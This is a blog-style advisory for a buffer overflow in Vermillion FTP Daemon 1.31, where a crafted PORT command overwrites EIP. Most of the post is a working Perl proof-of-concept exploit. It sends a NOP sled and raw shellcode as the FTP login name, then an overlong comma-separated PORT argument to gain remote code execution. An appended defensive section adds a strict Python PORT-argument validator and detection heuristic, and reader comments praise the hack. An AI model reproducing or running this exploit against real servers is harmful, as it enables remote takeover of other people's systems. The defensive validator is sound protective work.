vFTP Daemon v1.31 – Buffer Overflow Vulnerability

Vermillion FTP Daemon 1.31 (VFTPD) is a basic FTP server product from arcanesoft.com. VFTPD consistently receives rave reviews, and its thousands of loyal users around the world agree that it offers an unbeatable combination of high efficiency and security, reliable and robust operation, and easy configuration. VFTPD is a low-cost, low-maintenance solution for public Internet file servers, remote access services, or as a replacement for EDI providers.

As you might have guessed, yes, I am new to the team, and I have an interesting bug for you. I certainly enjoyed analysing it.
An attacker is able to control EIP by sending specific values in a crafted PORT command.
Because of the way the command has to be crafted you only get control over EIP, and because of the commas the rest of the buffer is unusable. This makes the approach to running code through this bug machine specific. For demonstration …
Use this Perl file to crash it. (If the machine-specific address is corrected it should open notepad on the system.)

#!/usr/bin/perl
use Net::FTP;
$host = $ARGV[0];
if ($host)
{
print "\nVFTPD 1.31 - PoC (code execution, machine specific exploit)\nX4lt\n";
$ftp = Net::FTP->new($host, Debug => 0);

# Build the address that ends up in EIP.
# As stated above, it is machine specific.

$var1 = "92000000," x 46;
$var2 = "92000000,";
# These fields become EIP (machine specific) => 0047380C
$var3 = "92000012,"; # 0C
$var4 = "92030008,"; # 38
$var5 = "92040007,"; # 47
$var6 = "92000000,"; # 00
$var7 = "2";

$buff = $var1.$var2.$var3.$var4.$var5.$var6.$var7;

$np = "\x90" x 200;
# Find the shellcode address in your favourite debugger.
$sc = “\xda\xde\xb8\xb8\x7f\xc3\xb5\x31\xc9\xb1\x33\xd9\x74\x24″ .
“\xf4\x5b\x31\x43\x1a\x83\xeb\xfc\x03\x43\x16\xe2\x4d\x83″ .
“\x2b\x3c\xad\x7c\xac\x5f\x24\x99\x9d\x4d\x52\xe9\x8c\x41″ .
“\x11\xbf\x3c\x29\x77\x54\xb6\x5f\x5f\x5b\x7f\xd5\xb9\x52″ .
“\x80\xdb\x05\x38\x42\x7d\xf9\x43\x97\x5d\xc0\x8b\xea\x9c” .
“\x05\xf1\x05\xcc\xde\x7d\xb7\xe1\x6b\xc3\x04\x03\xbb\x4f” .
“\x34\x7b\xbe\x90\xc1\x31\xc1\xc0\x7a\x4d\x89\xf8\xf1\x09″ .
“\x29\xf8\xd6\x49\x15\xb3\x53\xb9\xee\x42\xb2\xf3\x0f\x75″ .
“\xfa\x58\x2e\xb9\xf7\xa1\x77\x7e\xe8\xd7\x83\x7c\x95\xef” .
“\x50\xfe\x41\x65\x44\x58\x01\xdd\xac\x58\xc6\xb8\x27\x56″ .
“\xa3\xcf\x6f\x7b\x32\x03\x04\x87\xbf\xa2\xca\x01\xfb\x80″ .
“\xce\x4a\x5f\xa8\x57\x37\x0e\xd5\x87\x9f\xef\x73\xcc\x32″ .
“\xfb\x02\x8f\x58\xfa\x87\xaa\x24\xfc\x97\xb4\x06\x95\xa6″ .
“\x3f\xc9\xe2\x36\xea\xad\x13\xc6\x26\x38\x83\x71\xd3\x01″ .
“\xc9\x81\x0e\x45\xf4\x01\xba\x36\x03\x19\xcf\x33\x4f\x9d” .
“\x3c\x4e\xc0\x48\x42\xfd\xe1\x58\x2c\x6e\x6a\x06\xc0\x11″ .
“\xf6\xe6\x45\xaa\x93\xf6″;

$np2 = "\x90" x 30;
$sc = $np.$sc.$np2;
$ftp->login($sc, '');
sleep(2);
$ftp->port($buff);

}
else {
print "\nVFTPD 1.31 - PoC Exploit\nX4lt\n\n- Usage: $0 host\n";
}

Now, after you run the Perl script against the application, EIP will be the value you crafted in the script: in this case 0047380C, as you can also see in this WinDbg picture …

To find your specific address I would recommend using your favourite debugger and seeing where the shellcode ends up. That's all for now.
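As an added example from the defender's side (not part of the original advisory or of VFTPD): the root cause above is a PORT argument that is far longer and more oddly shaped than the command allows, so a strict parser that enforces the RFC 959 grammar (exactly six decimal fields, each 0-255, separated by commas) and caps the raw length before parsing rejects such input outright. Function names and the sample values are my own, constructed for the example.

```python
import re
from typing import Optional, Tuple

# Strict grammar for the PORT argument (RFC 959): h1,h2,h3,h4,p1,p2,
# six decimal fields of at most three digits each.
_PORT_ARG = re.compile(r"^(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})$")

# Six three-digit fields plus five commas is 23 characters; anything longer
# is rejected before any parsing or copying into a fixed-size buffer.
MAX_PORT_ARG_LEN = 23


def parse_port_arg(arg: str) -> Optional[Tuple[str, int]]:
    """Return (ip, port) for a well-formed PORT argument, otherwise None."""
    if len(arg) > MAX_PORT_ARG_LEN:
        return None
    m = _PORT_ARG.match(arg)
    if not m:
        return None
    fields = [int(x) for x in m.groups()]
    # The regex only bounds the digit count; each field must also fit a byte.
    if any(f > 255 for f in fields):
        return None
    ip = ".".join(str(f) for f in fields[:4])
    port = fields[4] * 256 + fields[5]
    if port == 0:
        return None
    return ip, port


def is_suspicious_port_arg(arg: str) -> bool:
    """Heuristic for log review or an IDS rule: anything the strict grammar
    rejects is worth flagging, since a legitimate client never sends it."""
    return parse_port_arg(arg) is None


# Constructed sample inputs: one with the shape of the PoC above (dozens of
# eight-digit comma-separated fields) and one well-formed argument.
SAMPLE_OVERLONG = "92000000," * 47 + "92000012,92030008,92040007,92000000,2"
SAMPLE_VALID = "192,168,1,10,4,1"
```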

Advisory: Vermillion FTP Daemon v1.31 – Buffer Overflow Vulnerability

[Writer: ~x4lt]


2 comments on “vFTP Daemon v1.31 – Buffer Overflow Vulnerability”

  1. KiluMac

    Nice Hack

  2. Rem0ve

    At least he left credits. ^^

    [+] Original : http://www.global-evolution.info/news/files/vftpd/vftpd.txt

    2010-01-30 D A Vermillion FTP Deamon v1.31 Remote BOF Exploit windows Author: Dz_attacker – http://www.exploit-db.com/exploits/11293
